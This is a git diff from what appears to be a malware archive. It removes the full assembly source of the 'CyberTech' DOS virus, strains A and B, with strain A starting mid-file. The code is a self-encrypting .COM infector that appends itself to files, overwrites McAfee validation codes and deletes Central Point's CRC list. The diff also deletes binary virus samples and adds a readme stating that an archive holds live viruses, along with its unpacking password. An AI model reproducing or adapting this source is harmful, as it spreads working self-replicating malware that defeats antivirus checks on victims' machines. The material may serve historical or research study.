overwrite - Mov Cx,Si ; the code with itself, so - Mov Dx,Di ; the file has no validation - Int 21h ; code - Jmp CalcVirus ; - -Check2: Cmp Ds:0Fb00h+42,0fdf0h ; check if protected with the - Jne Eof ; AV option - Cmp Ds:0Fb02h+42,0aac5h ; - Jne Eof ; - - Mov Ax,4200h ; yes - let virus overwrite - Mov Cx,Si ; the code with itself, so - Mov Dx,Di ; the file has no validation - Add Dx,42 ; code - Int 21h ; - Jmp CalcVirus ; - -Eof: Mov Ax,4202h ; not AG or AV - jump to - Call Fseek ; EOF - -CalcVirus: Sub Ax,3 ; calculate the jump for the - Mov Cs:CallPtr[BP]+1,Ax ; virus start - -GetCrypt: Mov Ah,2ch ; get 100s seconds for the - Int 21h ; encryption value. 
- Cmp Dl,0 ; if not zero, goto NoZero - Jne NoZero ; - - Mov Ah,9 ; If zero, display copyright - Lea Dx,Msg[Bp] ; message and generate again - Int 21h ; a number - Jmp GetCrypt ; - -NoZero: Mov Cs:Decrypt+2[BP],Dl ; Store key into decryptor - - Lea Si,MainVir[BP] ; Move changed decryptor to - Mov Di,0fb00h ; a safe place in memory - Mov Cx,DecrLen ; - Rep Movsb ; - - Lea Si,Crypt[BP] ; Encrypt the virus and merge - Mov Cx,CryptLen ; it to the changed decryptor -Encrypt: Lodsb ; code - Xor Al,Dl ; - Stosb ; - Loop Encrypt ; - - Mov Ah,40h ; append virus at EOF or over - Lea Dx,0fb00h ; the validation code of - Mov Cx,VirLen ; McAfee - Int 21h ; - - Mov Ax,4200h ; Jump to BOF - Call FSeek ; - - Mov Ah,40h ; Write Jump at BOF - Lea Dx,CallPtr[BP] ; - Mov Cx,4 ; - Int 21h ; - - Call Close ; Jump to Close routine - -Ready: Mov Ah,1ah ; Restore DTA to normal - Mov Dx,80h ; offset - Int 21h ; - - Mov Ax,Cs:OldInt24[Bp] ; remove critical error - Mov Dx,Cs:OldInt24+2[Bp] ; handler and store the - Xor Bx,Bx ; original handler at the - Push Bx ; interrupt table - Pop Ds ; - Mov Ds:[4*24h],Dx ; - Mov Ds:[4*24h]+2,Ax ; - Push Cs ; - Pop Ds ; - - Pop Ax ; restore possible error code - - Mov Bx,100h ; nice way to jump to the - Push Cs ; begin of the original host - Push Bx ; code - Retf ; - -Close: Pop Si ; why??? - - Pop Dx ; restore file date/time - Pop Cx ; stamp - Mov Ax,5701h ; - Int 21h ; - - Mov Ah,3eh ; close file - Int 21h ; - - Mov Ax,4301h ; restore file attributes - Pop Cx ; - Mov Dx,0fd1eh ; - Int 21h ; - - Mov Ah,41h ; delete CHKLIST.CPS (the - Lea Dx,CpsName[BP] ; Central Point CRC list) - Int 21h ; - - Push Si ; why??? - Ret - -; -; Message when we are in 1993 -; - -Removed Db 13,10,'The previous year you have been infected by a virus' - Db 13,10,'without knowing or removing it. To be gentle to you' - Db 13,10,'I decided to remove myself from your system. 
I suggest' - Db 13,10,'you better buy ViruScan of McAfee to ensure yourself' - Db 13,10,'complete security of your precious data. Next time you' - Db 13,10,'could be infected with a malevolent virus.' - Db 13,10,10,'May I say goodbye to you for now....',13,10 - -; -; Message when encryption byte = 0 or when we are living in 1993 -; - -Msg Db 13,10,'CyberTech Virus - Strain A' - Db 13,10,'(C) 1992 John Tardy of Trident' - Db 13,10,'$' - -; -; New critical error handler -; - -NewInt24: Mov Al,3 ; supress any critical error - Iret ; messages - -CpsName Db 'chklist.cps',0 ; name for CP CRC-list - -OldInt24 Dd 0 ; storage place for old int 24 - -CallPtr Db 0e9h,0,0 ; jump to place at BOF - -FileSpec Db '*.COM',0 ; filespec and infection marker - -OrgPrg: Int 20h ; original program - Db 'JT' ; - -CryptLen Equ $-Crypt ; encrypted part length - -VirLen Equ $-MainVir ; total virus length - - -; -; > and Remember Don't Forget to Call < -; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < -; diff --git a/c/CYBTCH-B (53).ASM b/c/CYBTCH-B (53).ASM deleted file mode 100755 index b7ae904..0000000 --- a/c/CYBTCH-B (53).ASM +++ /dev/null 
@@ -1,500 +0,0 @@ -; -; CyberTech Virus - Strain B John Tardy (C) 1992 -; -; Written in A86 V3.22 -; -; Description : This is a Non-Resident Self-Encrypting .COM file infector -; which infects COM files in the current directory. It will -; remove CHKLIST.CPS from the current directory after it has -; infected a program. CHKLIST.CPS is a file which is used by -; VDEFEND of PCSHELL and Central Point AntiVirus. When a -; validation code is added by SCAN of McAfee, it will overwrite -; the code, so the file is no longer CRC protected anymore. -; After 1993, the virus activated. It then displays a message -; that your system has been infected. The virus will remove -; itself from the infected file and completely restore it. If -; a validation code was added, it is lost, but the file is not -; corrupted and will function normally. Even when the file is -; compressed afterwards by an executable file compressor, it is -; uncompressed. Before 1994, the virus sometimes display it's -; copyright. This is caused when the random encryption counter -; is a 0. It will redefine it, so there is no visible text in -; the virus. It checks also if there is enough diskspace -; aveable and installs a critical error handler. -; - Org 0h ; Generate .BIN file - -Start: Jmp MainVir ; Jump to decryptor code at EOF - - Db '*' ; Virus signature (very short) - -; -; Decryptor procedure -; - -MainVir: Call On1 ; Push offset on stack - -On1: Pop BP ; Calculate virus offset - Sub BP,Offset MainVir+3 ; - - Push Ax ; Save possible error code - - Lea Si,Crypt[BP] ; Decrypt the virus with a - Mov Di,Si ; very simple exclusive or - Mov Cx,CryptLen ; function. 
-Decrypt: Lodsb ; - Xor Al,0 ; - Stosb ; - Loop Decrypt ; - -DecrLen Equ $-MainVir ; Length of the decryptor - -; -; Main initialization procedure -; - -Crypt: Mov Ax,Cs:OrgPrg[BP] ; Store begin of host at - Mov Bx,Cs:OrgPrg[BP]+2 ; cs:100h (begin of com) - Mov Cs:Start+100h,Ax ; - Mov Cs:Start[2]+100h,Bx ; - - Xor Ax,Ax ; Get original interrupt 24 - Push Ax ; (critical error handler) - Pop Ds ; - Mov Bx,Ds:[4*24h] ; - Mov Es,Ds:[4*24h]+4 ; - - Mov Word Ptr Cs:OldInt24[Bp],Bx ; And store it on a save place - Mov Word Ptr Cs:OldInt24+2[Bp],Es ; - - Lea Bx,NewInt24[Bp] ; Install own critical error - Push Cs ; handler to avoid messages - Pop Es ; when a disk is write - Mov Word Ptr Ds:[4*24h],Bx ; protected and such things - Mov Word Ptr Ds:[4*24h]+2,Es ; - Push Cs ; - Pop Ds ; - - Mov Ah,30h ; Check if DOS version is - Int 21h ; 3.0 or above for correct - Cmp Al,3 ; interrupt use - Jae TestDate ; - Jmp Ready ; - -TestDate: Mov Ah,2ah ; Check if 1993 is past time - Int 21h ; already - Cmp Cx,1994 ; - Jae Clean ; - 1994 or more - Jmp NoClean ; - Not 1994 or more - -; -; Main Cleanup procedure -; - -Clean: Mov Ah,1ah ; Move DTA to a safe place - Mov Dx,0fd00h ; - Int 21h ; - - Mov Ax,Cs:[2ch] ; Find the name of the - Mov Ds,Ax ; program that is now - Mov Si,0 ; executed (me must search in - Mov Cx,4000h ; the DOS environment for -Seeker: Lodsb ; safe tracking of the name - Cmp Al,1 ; - Je On3 ; - Loop Seeker ; - -On3: Inc Si ; Transfer the found name - Push Cs ; to a safe address in memory - Pop Es ; - Mov Di,0fd80h ; - Mov Cx,80h ; -Trans: Lodsb ; - Cmp Al,0 ; - Je Verder ; - Stosb ; - Loop Trans ; - -Verder: Stosb - Sub Di,12 - Push Cs - Pop Ds - Mov Ax,[Di][0] ; - Cmp Ax,'OC' - Jne Normal - Mov Ax,[Di][2] - Cmp Ax,'MM' - Jne Normal - Mov Ax,[Di][4] - Cmp Ax,'NA' - Jne Normal - Jmp Ready - -Normal: Push Cs ; Read file attributes and - Pop Ds ; check if an error has - Mov Ax,4300h ; occured - Mov Dx,0fd80h ; - Int 21h ; - Jnc DeInfect ; - No error, DeInfect - Jmp Ready 
; - Error, Ready - -DeInfect: Push Cx ; Store old file attributes - - Mov Ax,4301h ; Clear file attributes - Xor Cx,Cx ; (for read only etc.) - Int 21h ; - - Mov Ax,3d02h ; Open the file - Int 21h ; - - Mov Bx,Ax ; Read file date/time stamp - Mov Ax,5700h ; and store it on the stack - Int 21h ; for later use - Push Cx ; - Push Dx ; - - Mov Ah,3eh ; Close file - Int 21h ; - - Mov Dx,0fd80h ; Create a new file with the - Xor Cx,Cx ; same name - Mov Ah,3ch ; - Int 21h ; - - Mov Bx,Ax ; store file handle in BX - - Mov Dx,100h ; program to file (the original - Mov Cx,Bp ; file is now back again) - Sub Cx,0fch ; - - Mov Ah,40h ; write memory image of host - Int 21h ; - - Pop Dx ; restore file date/time - Pop Cx ; stamp - Mov Ax,5701h ; - Int 21h ; - - Mov Ah,3eh ; close file - Int 21h ; - - Pop Cx ; restore file attributes - Mov Ax,4301h ; - Mov Dx,0fd80h ; - Int 21h ; - - Push Cs ; Show message that the - Pop Ds ; system has been infected - Mov Ah,9 ; and shutdown virus - Lea Dx,Removed[Bp] ; - Int 21h ; - Jmp Ready ; - -; -; Main viral part -; - -NoClean: Mov Ah,1ah ; Store DTA at safe place - Mov Dx,0fd00h ; - Int 21h ; - - Mov Ah,4eh ; FindFirsFile Function - -Search: Lea Dx,FileSpec[BP] ; Search for filespec given - Xor Cx,Cx ; in FileSpec adress - Int 21h ; - Jnc Found ; Found - Found - Jmp Ready ; Not Found - Ready - -Found: Mov Ax,4300h ; Get file attributes and - Mov Dx,0fd1eh ; store them on the stack - Int 21h ; - Push Cx ; - - Mov Ax,4301h ; clear file attributes - Xor Cx,Cx ; - Int 21h ; - - Mov Ax,3d02h ; open file with read/write - Int 21h ; access - - Mov Bx,5700h ; save file date/time stamp - Xchg Ax,Bx ; on the stack - Int 21h ; - Push Cx ; - Push Dx ; - - Mov Ah,3fh ; read the first 4 bytes of - Lea Dx,OrgPrg[BP] ; the program onto OrgPrg - Mov Cx,4 ; - Int 21h ; - - Mov Ax,Cs:[OrgPrg][BP] ; Check if renamed exe-file - Cmp Ax,'ZM' ; - Je ExeFile ; - - Cmp Ax,'MZ' ; Check if renamed weird exe- - Je ExeFile ; file - - Mov Ah,Cs:[OrgPrg+3][BP] ; Check if 
already infected - Cmp Ah,'*' ; - Jne Infect ; - -ExeFile: Call Close ; If one of the checks is yes, - Mov Ah,4fh ; close file and search next - Jmp Search ; file - -FSeek: Xor Cx,Cx ; subroutine to jump to end - Xor Dx,Dx ; or begin of file - Int 21h ; - Ret ; - -Infect: Mov Ax,0fd1e[0] ; check if the file is - Cmp Ax,'OC' ; COMMAN?.COM (usually result - Jne NoCommand ; if COMMAND.COM) - Mov Ax,0fd1e[2] ; - Cmp Ax,'MM' ; - Jne NoCommand ; - Mov Ax,0fd1e[4] ; - Cmp Ax,'NA' ; - Jne NoCommand ; - - Mov Ax,4202h ; Jump to EOF - Call Fseek ; - - Cmp Ax,0f000h ; Check if file too large - Jae ExeFile - - Cmp Ax,VirS ; Check if file to short - jbe ExeFile - - Sub Ax,VirS - Xchg Cx,Dx - Mov Dx,4200h - Xchg Dx,Ax - Mov EOFminVir[BP],Dx - Int 21h - Mov Ah,3fh - Mov Dx,Offset Buffer - Mov Cx,VirS - Int 21h - Cld - Mov Si,Offset Buffer - Mov Cx,VirLen -On5: - Push Cx -On6: Lodsb - Cmp Al,0 - Jne On4 - Loop On6 -On4: Cmp Cx,0 - Je Found0 - - Pop Cx - Cmp Si,SeekLen - Jb On5 - Jmp NoCommand - -Found0: Pop Cx - Sub Si,Offset Buffer - Sub Si,Cx - Xor Cx,Cx - Mov Dx,EOFminVir[BP] - Add Dx,Si - - Mov Ax,4200h - Int 21h - Jmp CalcVirus - -EOFminVir Dw 0 - -NoCommand: Mov Ax,4202h ; jump to EOF - Call FSeek ; - - Cmp Ax,0f000h ; Check if file too large - Jb NoExe1 ; if yes, goto exefile - Jmp ExeFile ; - -NoExe1: Cmp Ax,10 ; Check if file too short - Ja NoExe2 ; if yes, goto exefile - Jmp ExeFile ; - - -NoExe2: Mov Cx,Dx ; calculate pointer to offset - Mov Dx,Ax ; EOF-52 (for McAfee validation - Sub Dx,52 ; codes) - - Mov Si,Cx ; move file pointer to the - Mov Di,Dx ; calculated address - Mov Ax,4200h ; - Int 21h ; - - Mov Ah,3fh ; read the last 52 bytes - Mov Dx,0fb00h ; of the file - Mov Cx,52 ; - Int 21h ; - - Cmp Ds:0Fb00h,0fdf0h ; check if protected with the - Jne Check2 ; AG option - Cmp Ds:0fb02h,0aac5h ; - Jne Check2 ; - - Mov Ax,4200h ; yes - let virus overwrite - Mov Cx,Si ; the code with itself, so - Mov Dx,Di ; the file has no validation - Int 21h ; code - Jmp CalcVirus ; 
- -Check2: Cmp Ds:0Fb00h+42,0fdf0h ; check if protected with the - Jne Eof ; AV option - Cmp Ds:0Fb02h+42,0aac5h ; - Jne Eof ; - - Mov Ax,4200h ; yes - let virus overwrite - Mov Cx,Si ; the code with itself, so - Mov Dx,Di ; the file has no validation - Add Dx,42 ; code - Int 21h ; - Jmp CalcVirus ; - -Eof: Mov Ax,4202h ; not AG or AV - jump to - Call Fseek ; EOF - -CalcVirus: Sub Ax,3 ; calculate the jump for the - Mov Cs:CallPtr[BP]+1,Ax ; virus start - -GetCrypt: Mov Ah,2ch ; get 100s seconds for the - Int 21h ; encryption value. - Cmp Dl,0 ; if not zero, goto NoZero - Jne NoZero ; - - Mov Ah,9 ; If zero, display copyright - Lea Dx,Msg[Bp] ; message and generate again - Int 21h ; a number - Jmp GetCrypt ; - -NoZero: Mov Cs:Decrypt+2[BP],Dl ; Store key into decryptor - - Lea Si,MainVir[BP] ; Move changed decryptor to - Mov Di,0fb00h ; a safe place in memory - Mov Cx,DecrLen ; - Rep Movsb ; - - Lea Si,Crypt[BP] ; Encrypt the virus and merge - Mov Cx,CryptLen ; it to the changed decryptor -Encrypt: Lodsb ; code - Xor Al,Dl ; - Stosb ; - Loop Encrypt ; - - Mov Ah,40h ; append virus at EOF or over - Lea Dx,0fb00h ; the validation code of - Mov Cx,VirLen ; McAfee - Int 21h ; - - Mov Ax,4200h ; Jump to BOF - Call FSeek ; - - Mov Ah,40h ; Write Jump at BOF - Lea Dx,CallPtr[BP] ; - Mov Cx,4 ; - Int 21h ; - - Call Close ; Jump to Close routine - -Ready: Mov Ah,1ah ; Restore DTA to normal - Mov Dx,80h ; offset - Int 21h ; - - Mov Ax,Cs:OldInt24[Bp] ; remove critical error - Mov Dx,Cs:OldInt24+2[Bp] ; handler and store the - Xor Bx,Bx ; original handler at the - Push Bx ; interrupt table - Pop Ds ; - Mov Ds:[4*24h],Dx ; - Mov Ds:[4*24h]+2,Ax ; - Push Cs ; - Pop Ds ; - - Pop Ax ; restore possible error code - - Mov Bx,100h ; nice way to jump to the - Push Cs ; begin of the original host - Push Bx ; code - Retf ; - -Close: Pop Si ; why??? 
- - Pop Dx ; restore file date/time - Pop Cx ; stamp - Mov Ax,5701h ; - Int 21h ; - - Mov Ah,3eh ; close file - Int 21h ; - - Mov Ax,4301h ; restore file attributes - Pop Cx ; - Mov Dx,0fd1eh ; - Int 21h ; - - Mov Ah,41h ; delete CHKLIST.CPS (the - Lea Dx,CpsName[BP] ; Central Point CRC list) - Int 21h ; - - Push Si ; why??? - Ret - -; -; Message when we are in 1994 -; - -;Removed Db 13,10,'Virus removed : ',13,10 - -Removed Db 13,10,'The previous year you have been infected by a virus' - Db 13,10,'without knowing or removing it. To be gentle to you' - Db 13,10,'I decided to remove myself from your system. I suggest' - Db 13,10,'you better buy ViruScan of McAfee to ensure yourself' - Db 13,10,'complete security of your precious data. Next time you' - Db 13,10,'could be infected with a malevolent virus.' - Db 13,10,10,'May I say goodbye to you for now....',13,10 - -; -; Message when encryption byte = 0 or when we are living in 1994 -; - -Msg Db 13,10,'CyberTech Virus - Strain B' - Db 13,10,'(C) 1992 John Tardy of Trident' - Db 13,10,'$' - -; -; New critical error handler -; - -NewInt24: Mov Al,3 ; supress any critical error - Iret ; messages - -CpsName Db 'chklist.cps',0 ; name for CP CRC-list - -OldInt24 Dd 0 ; storage place for old int 24 - -CallPtr Db 0e9h,0,0 ; jump to place at BOF - -FileSpec Db '*.COM',0 ; filespec and infection marker - -OrgPrg: Int 20h ; original program - Db 'JT' ; - -CryptLen Equ $-Crypt ; encrypted part length - -VirLen Equ $-MainVir ; total virus length - -Buffer Equ 0f040h ; buffer offset -VirS Equ VirLen*2 - -SeekLen Equ Buffer+Virs - -; -; > and Remember Don't Forget to Call < -; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < -; diff --git a/q/QBootDr6.com b/q/QBootDr6.com deleted file mode 100755 index 8698dbf..0000000 Binary files a/q/QBootDr6.com and /dev/null differ diff --git a/q/QBootDr6.exe b/q/QBootDr6.exe deleted file mode 100755 index 858b78e..0000000 Binary files a/q/QBootDr6.exe and /dev/null differ 
diff --git a/q/QMU.1513.com b/q/QMU.1513.com
deleted file mode 100755
index c9fa7d1..0000000
Binary files a/q/QMU.1513.com and /dev/null differ
diff --git a/q/QRes.149.com b/q/QRes.149.com
deleted file mode 100755
index 1efef65..0000000
Binary files a/q/QRes.149.com and /dev/null differ
diff --git a/q/QScare.cascade.com b/q/QScare.cascade.com
deleted file mode 100755
index 8fa67ac..0000000
Binary files a/q/QScare.cascade.com and /dev/null differ
diff --git a/q/Quadratic.1283.com b/q/Quadratic.1283.com
deleted file mode 100755
index a758d2a..0000000
Binary files a/q/Quadratic.1283.com and /dev/null differ
diff --git a/q/Quadratic.1285 (Gen1).com b/q/Quadratic.1285 (Gen1).com
deleted file mode 100755
index 5a68072..0000000
Binary files a/q/Quadratic.1285 (Gen1).com and /dev/null differ
diff --git a/q/Quadratic.981.com b/q/Quadratic.981.com
deleted file mode 100755
index bbfa0cf..0000000
Binary files a/q/Quadratic.981.com and /dev/null differ
diff --git a/q/Quadratic.986.com b/q/Quadratic.986.com
deleted file mode 100755
index c2bd02f..0000000
Binary files a/q/Quadratic.986.com and /dev/null differ
diff --git a/q/Quake.exe b/q/Quake.exe
deleted file mode 100755
index f480c11..0000000
Binary files a/q/Quake.exe and /dev/null differ
diff --git a/q/Quicky.exe b/q/Quicky.exe
deleted file mode 100755
index bec6482..0000000
Binary files a/q/Quicky.exe and /dev/null differ
diff --git a/q/Quiet.com b/q/Quiet.com
deleted file mode 100755
index 7b744c3..0000000
Binary files a/q/Quiet.com and /dev/null differ
diff --git a/q/Quinine.exe b/q/Quinine.exe
deleted file mode 100755
index 845b2c3..0000000
Binary files a/q/Quinine.exe and /dev/null differ
diff --git a/q/Quit.A.com b/q/Quit.A.com
deleted file mode 100755
index 791bd1a..0000000
Binary files a/q/Quit.A.com and /dev/null differ
diff --git a/q/Quit.A.exe b/q/Quit.A.exe
deleted file mode 100755
index 791bd1a..0000000
Binary files a/q/Quit.A.exe and /dev/null differ
diff --git a/q/Quit.B.com b/q/Quit.B.com
deleted file mode 100755
index 0ed4482..0000000
Binary files a/q/Quit.B.com and /dev/null differ
diff --git a/q/q.7z b/q/q.7z
new file mode 100644
index 0000000..f73ba92
Binary files /dev/null and b/q/q.7z differ
diff --git a/q/readme.txt b/q/readme.txt
new file mode 100644
index 0000000..bdf5d2a
--- /dev/null
+++ b/q/readme.txt
@@ -0,0 +1,10 @@
+The files contained in q.7z are all live virii contained in .com or .exe
+files.
+
+These are not source code, they are executables which can result in an
+infection on DOS or Windows based systems if they are run with the
+proper system permissions. They are, however, properly detected by
+Windows Defender and many other commercial firewall products.
+
+To unpack this archive, use the password "virus".
+